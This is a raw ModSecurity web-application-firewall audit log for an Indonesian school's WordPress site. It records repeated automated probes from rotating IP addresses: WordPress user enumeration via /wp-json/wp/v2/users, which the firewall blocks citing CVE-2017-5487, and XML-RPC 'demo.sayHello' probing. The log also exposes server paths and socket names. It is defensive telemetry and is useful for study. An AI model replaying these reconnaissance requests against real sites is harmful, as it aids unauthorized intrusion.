proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424083682409 6816 (- - -) Stopwatch2: 1747424083682409 6816; combined=4830, p1=599, p2=3984, p3=36, p4=40, p5=101, sr=80, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2cffa82a-Z-- --d1424364-A-- [17/May/2025:02:34:48 +0700] aCeTWNhEtho3ciA0wehdrQAAAJU 103.236.140.4 54012 103.236.140.4 8181 --d1424364-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d1424364-C-- demo.sayHello --d1424364-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1424364-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424088488895 5092 (- - -) Stopwatch2: 1747424088488895 5092; combined=3821, p1=502, p2=3110, p3=24, p4=27, p5=92, sr=85, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1424364-Z-- --b20f8a47-A-- [17/May/2025:02:35:18 +0700] aCeTdkE0LfP59mkCzg417gAAAM4 103.236.140.4 54016 103.236.140.4 8181 --b20f8a47-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b20f8a47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b20f8a47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424118203591 3466 (- - -) Stopwatch2: 1747424118203591 3466; combined=1441, p1=492, p2=912, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b20f8a47-Z-- --23dfa607-A-- [17/May/2025:02:35:26 +0700] aCeTfkE0LfP59mkCzg417wAAAMI 103.236.140.4 54020 103.236.140.4 8181 --23dfa607-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --23dfa607-C-- demo.sayHello --23dfa607-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --23dfa607-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424126284167 5952 (- - -) Stopwatch2: 1747424126284167 5952; combined=4274, p1=539, p2=3508, p3=29, p4=31, p5=97, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23dfa607-Z-- --dbe4892d-A-- [17/May/2025:02:35:36 +0700] aCeTiNhEtho3ciA0wehdsAAAAJQ 103.236.140.4 54024 103.236.140.4 8181 --dbe4892d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dbe4892d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbe4892d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424136041568 2983 (- - -) Stopwatch2: 1747424136041568 2983; combined=1321, p1=436, p2=850, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbe4892d-Z-- --fffc1b06-A-- [17/May/2025:02:35:39 +0700] aCeTi9hEtho3ciA0wehdsgAAAJg 103.236.140.4 54028 103.236.140.4 8181 --fffc1b06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fffc1b06-C-- demo.sayHello --fffc1b06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fffc1b06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424139560572 5463 (- - -) Stopwatch2: 1747424139560572 5463; combined=4088, p1=532, p2=3335, p3=31, p4=33, p5=93, sr=78, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fffc1b06-Z-- --9bce6805-A-- [17/May/2025:02:37:44 +0700] aCeUCNhEtho3ciA0wehdtQAAAIU 103.236.140.4 54042 103.236.140.4 8181 --9bce6805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9bce6805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bce6805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424264030832 2814 (- - -) Stopwatch2: 1747424264030832 2814; combined=1278, p1=447, p2=800, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bce6805-Z-- --afee6c41-A-- [17/May/2025:02:37:52 +0700] aCeUENhEtho3ciA0wehdtwAAAIk 103.236.140.4 54046 103.236.140.4 8181 --afee6c41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --afee6c41-C-- demo.sayHello --afee6c41-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --afee6c41-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424272767280 3363 (- - -) Stopwatch2: 1747424272767280 3363; combined=2492, p1=313, p2=1994, p3=18, p4=62, p5=61, sr=43, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afee6c41-Z-- --4620d243-A-- [17/May/2025:02:39:15 +0700] aCeUY8e47ocjCGWTS4Y-7gAAAEU 103.236.140.4 54058 103.236.140.4 8181 --4620d243-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4620d243-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4620d243-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424355437679 2878 (- - -) Stopwatch2: 1747424355437679 2878; combined=1330, p1=432, p2=867, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4620d243-Z-- --a923235f-A-- [17/May/2025:02:39:21 +0700] aCeUadhEtho3ciA0wehduwAAAIg 103.236.140.4 54062 103.236.140.4 8181 --a923235f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a923235f-C-- demo.sayHello --a923235f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a923235f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424361283579 4946 (- - -) Stopwatch2: 1747424361283579 4946; combined=3804, p1=467, p2=3086, p3=23, p4=26, p5=120, sr=68, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a923235f-Z-- --5eef5d0a-A-- [17/May/2025:02:39:59 +0700] aCeUj8e47ocjCGWTS4Y-7wAAAEQ 103.236.140.4 54066 103.236.140.4 8181 --5eef5d0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5eef5d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eef5d0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424399786882 3061 (- - -) Stopwatch2: 1747424399786882 3061; combined=1331, p1=444, p2=858, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eef5d0a-Z-- --6acc2f28-A-- [17/May/2025:02:40:04 +0700] aCeUlNhEtho3ciA0wehdvgAAAJM 103.236.140.4 54070 103.236.140.4 8181 --6acc2f28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6acc2f28-C-- demo.sayHello --6acc2f28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6acc2f28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424404447214 6770 (- - -) Stopwatch2: 1747424404447214 6770; combined=4746, p1=614, p2=3882, p3=37, p4=43, p5=101, sr=84, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6acc2f28-Z-- --396d0654-A-- [17/May/2025:02:40:37 +0700] aCeUtce47ocjCGWTS4Y-8AAAAEo 103.236.140.4 54076 103.236.140.4 8181 --396d0654-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --396d0654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --396d0654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424437828134 3265 (- - -) Stopwatch2: 1747424437828134 3265; combined=1384, p1=478, p2=874, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --396d0654-Z-- --81229b55-A-- [17/May/2025:02:40:44 +0700] aCeUvMe47ocjCGWTS4Y-8QAAAEc 103.236.140.4 54080 103.236.140.4 8181 --81229b55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --81229b55-C-- demo.sayHello --81229b55-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --81229b55-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424444343159 5003 (- - -) Stopwatch2: 1747424444343159 5003; combined=3786, p1=488, p2=3091, p3=26, p4=29, p5=90, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81229b55-Z-- --9cb7cd54-A-- [17/May/2025:02:41:06 +0700] aCeU0thEtho3ciA0wehdwwAAAJY 103.236.140.4 54084 103.236.140.4 8181 --9cb7cd54-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9cb7cd54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cb7cd54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424466954035 3311 (- - -) Stopwatch2: 1747424466954035 3311; combined=1388, p1=454, p2=900, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb7cd54-Z-- --5cd5f06c-A-- [17/May/2025:02:41:12 +0700] aCeU2NhEtho3ciA0wehdxQAAAJI 103.236.140.4 54088 103.236.140.4 8181 --5cd5f06c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5cd5f06c-C-- demo.sayHello --5cd5f06c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cd5f06c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424472577580 5264 (- - -) Stopwatch2: 1747424472577580 5264; combined=3980, p1=504, p2=3263, p3=29, p4=32, p5=90, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cd5f06c-Z-- --22ebfb4d-A-- [17/May/2025:02:41:30 +0700] aCeU6thEtho3ciA0wehdxgAAAJc 103.236.140.4 54098 103.236.140.4 8181 --22ebfb4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --22ebfb4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ebfb4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424490822868 2258 (- - -) Stopwatch2: 1747424490822868 2258; combined=1013, p1=323, p2=668, p3=0, p4=0, p5=22, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ebfb4d-Z-- --28b9684a-A-- [17/May/2025:02:41:36 +0700] aCeU8Me47ocjCGWTS4Y-8gAAAEw 103.236.140.4 54102 103.236.140.4 8181 --28b9684a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --28b9684a-C-- demo.sayHello --28b9684a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --28b9684a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] 